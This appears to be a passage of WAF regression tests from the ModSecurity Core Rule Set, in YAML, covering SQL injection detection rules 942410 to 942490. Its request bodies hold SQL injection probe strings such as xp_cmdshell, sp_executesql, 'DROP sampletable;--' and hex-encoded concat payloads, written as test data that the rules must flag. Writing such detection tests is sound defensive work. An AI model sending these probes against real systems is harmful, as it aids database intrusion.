    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=lower%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-61
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=MAKE_SET%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-62
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=MAX%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-63
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=md5%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-64
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=md5%5C%28"  # pay=md5\(
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-65
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=MID%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-66
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=minute+%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-67
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=month%3D%28"  # pay=month=(
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  # From 942410-68 on, many bodies drop the "pay=" name and send "(" raw.
  # NOTE(review): with a form-encoded body the whole string would then be
  # an argument name rather than a value, so these cases presumably rely
  # on the rule inspecting names as well - confirm against the rule's
  # target list.
  - test_title: 942410-68
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "name_const("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-69
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "now("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  # Mixed-case variant of the previous payload.
  - test_title: 942410-70
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "nOW("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-71
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "ord("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-72
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "password?("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-73
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "password/?("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-74
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "Password>$("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-75
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pg_sleep("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-76
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pi("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-77
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "PI("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-78
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pow("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-79
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "POW("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  # NOTE(review): the whitespace between "quarter." and "(" could not be
  # verified; check the payload against the upstream test file.
  - test_title: 942410-80
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "quarter. ("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-81
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "rand("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  # Mixed case plus a space before the parenthesis.
  - test_title: 942410-82
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "Rand ("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-83
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "RAND("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-84
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "replace("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-85
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "REPLACE("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-86
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "round ("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-87
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "round("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-88
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "rtrim("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-89
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "RTRIM("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  # From here the "pay=" name reappears on some entries, still with the
  # parenthesis (and any space) sent unencoded.
  - test_title: 942410-90
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=sin ("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-91
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "SIN("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-92
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=sleep("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-93
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "SLEEP ("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-94
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=strcmp("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-95
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=substr("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-96
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "SUBSTR("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-97
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=substring("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-98
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "SUBSTRING("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-99
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=sysdate("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-100
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "time ("
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  # The remaining entries return to the percent-encoded "pay=" form.
  - test_title: 942410-101
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=time%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-102
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=trim%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-103
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=Uncompress+%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-104
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=unhex%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  # Alternating-case variant of the previous payload.
  - test_title: 942410-105
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=uNhEx%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-106
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=updatexml%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-107
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=UpdateXML%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-108
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=UPPER%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-109
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=user+%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-110
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=user%2F%3F%28"  # pay=user/?(
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-111
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=user%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-112
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=values+%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-113
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=VALUES%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-114
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=version%3D%28"  # pay=version=(
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-115
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=version%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-116
desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=xmltype%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-117 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=XMLType%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-118 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=year%5D%3D%28" version: HTTP/1.0 output: log_contains: id "942410" �������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml��������0000664�0000000�0000000�00000001102�14461225151�0027705�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. 
Peron" description: None enabled: true name: 942420.yaml tests: - test_title: 942420-1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" method: POST port: 80 uri: "/" version: HTTP/1.0 output: log_contains: id "942420" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml��������0000664�0000000�0000000�00000001057�14461225151�0027717�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. 
Peron" description: None enabled: true name: 942421.yaml tests: - test_title: 942421-1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost Cookie: "cookie=@@@@@@@@@@@@@" method: GET port: 80 uri: "/" version: HTTP/1.0 output: log_contains: id "942421" ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml��������0000664�0000000�0000000�00000001037�14461225151�0027715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. 
Peron" description: None enabled: true name: 942430.yaml tests: - test_title: 942430-1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=(((((())))))&var2=whatever" version: HTTP/1.0 output: log_contains: id "942430" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml��������0000664�0000000�0000000�00000001045�14461225151�0027715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. 
Peron" description: None enabled: true name: 942431.yaml tests: - test_title: 942431-1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=-------------------&var2=whatever" version: HTTP/1.0 output: log_contains: id "942431" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml��������0000664�0000000�0000000�00000001020�14461225151�0027707�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. 
Peron" description: None enabled: true name: 942432.yaml tests: - test_title: 942432-1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=;;dd foo bar" version: HTTP/1.0 output: log_contains: id "942432" ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml��������0000664�0000000�0000000�00000000730�14461225151�0027715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. 
Peron" description: None enabled: true name: 942440.yaml tests: - test_title: 942440-1 desc: "SQL Comment Sequence" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?var=DROP%20sampletable%3b--" version: HTTP/1.0 output: log_contains: id "942440" ����������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml��������0000664�0000000�0000000�00000004070�14461225151�0027717�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "William Woodson" description: None enabled: true name: 942450.yaml tests: - test_title: 942450-1 desc: "SQL Hex Encoding" stages: - stage: input: dest_addr: 127.0.0.1 port: 80 headers: Host: localhost method: POST uri: "/" data: "var=%5c0xf00dsdfdsa" version: HTTP/1.0 output: log_contains: id "942450" - test_title: 942450-2 desc: "SQL Hex Encoding" stages: - stage: input: dest_addr: 127.0.0.1 port: 80 headers: Host: localhost method: POST uri: "/" data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" version: HTTP/1.0 output: log_contains: id "942450" - test_title: 942450-3 desc: "SQL Hex Encoding" stages: - stage: input: dest_addr: 127.0.0.1 port: 80 headers: Host: localhost method: POST uri: "/" data: "var=select%200x616263" version: HTTP/1.0 output: log_contains: id "942450" - test_title: 942450-4 desc: "SQL Hex Encoding - negative" stages: - stage: input: dest_addr: 127.0.0.1 port: 80 headers: Host: localhost method: POST uri: "/" data: "var=IHRlc3Q0xAcF" version: HTTP/1.0 output: no_log_contains: id "942450" - test_title: 942450-5 desc: "SQL Hex Encoding - negative" stages: - stage: 
input: dest_addr: 127.0.0.1 port: 80 headers: Host: localhost method: POST uri: "/" data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" version: HTTP/1.0 output: no_log_contains: id "942450" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml��������0000664�0000000�0000000�00000007400�14461225151�0027721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christoph Hansen" description: None enabled: true name: 942470.yaml tests: - test_title: 942470-1 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=nvarchar" version: HTTP/1.0 output: log_contains: id "942470" - test_title: 942470-2 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=xp_cmdshell" version: HTTP/1.0 output: log_contains: id "942470" - test_title: 942470-3 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=varchar" version: HTTP/1.0 output: log_contains: id "942470" - test_title: 942470-4 desc: "SQL 
Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=xp_dirtree"
            version: HTTP/1.0
          output:
            log_contains: id "942470"
  # Tests 942470-5 to 942470-10. Each entry sends one HTTP/1.0 POST to
  # 127.0.0.1:80 whose body is a single bare identifier (names of SQL
  # Server / Oracle built-ins) with no surrounding SQL syntax, and
  # expects the log to name rule id "942470". All are must-detect cases;
  # this range holds no negative (no_log_contains) entries.
  - test_title: 942470-5
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=xp_regread"
            version: HTTP/1.0
          output:
            log_contains: id "942470"
  - test_title: 942470-6
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=sp_password"
            version: HTTP/1.0
          output:
            log_contains: id "942470"
  # Upper-case identifiers: presumably checks that matching is
  # case-insensitive - confirm against the rule.
  - test_title: 942470-7
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=UTL_HTTP"
            version: HTTP/1.0
          output:
            log_contains: id "942470"
  - test_title: 942470-8
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=OPENROWSET"
            version: HTTP/1.0
          output:
            log_contains: id "942470"
  - test_title: 942470-9
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=sp_executesql"
            version: HTTP/1.0
          output:
            log_contains: id "942470"
  # Same identifier as 942470-9 but without the "pay=" name.
  # NOTE(review): with a form-encoded body the identifier would then be
  # an argument name rather than a value - confirm that the rule is
  # meant to inspect names too.
  - test_title: 942470-10
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "sp_executesql"
            version: HTTP/1.0
          output:
            log_contains: id "942470"
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml��������0000664�0000000�0000000�00000002014�14461225151�0027716�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Jose Nazario" description: None enabled: true name: 942480.yaml tests: - test_title: 942480-1 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: "127.0.0.1" headers: Host: "localhost" Cache-Control: "no-cache, no-store, must-revalidate" method: GET port: 80 # variable name boundary attacks uri: "/?'msdasql'" version: HTTP/1.0 output: log_contains: "id \"942480" - test_title: 942480-2 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: "127.0.0.1" headers: Host: "localhost" Cache-Control: "no-cache, no-store, must-revalidate" # variable name boundary attacks Cookie: "'msdasql'" method: POST port: 80 version: HTTP/1.0 output: log_contains: "id \"942480" 
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml��������0000664�0000000�0000000�00000020657�14461225151�0027734�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christoph Hansen" description: None enabled: true name: 942490.yaml tests: - test_title: 942490-1 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=%22%60%20%2A%20123" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-2 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "' ', 10" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-3 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "'', '', '', '', '', '', '', '', 13" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-4 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 
80
            uri: "/"
            data: "`>65"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  # Tests 942490-5 to 942490-20. Each entry sends one HTTP/1.0 POST to
  # 127.0.0.1:80 and expects the log to name rule id "942490"; all are
  # must-detect cases. Bodies are sent with quotes, backticks and
  # brackets unencoded, and several carry no "pay=" name.
  # NOTE(review): where "pay=" is missing, a form-encoded body would be
  # parsed as an argument name rather than a value - confirm the rule is
  # meant to cover names.
  # The \" and \\ sequences below are YAML double-quote escapes; the
  # request body carries a plain " or \ in their place.
  - test_title: 942490-5
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay='1001'='10"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-6
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "\"2562*23"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-7
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=\":[\"00"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-8
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
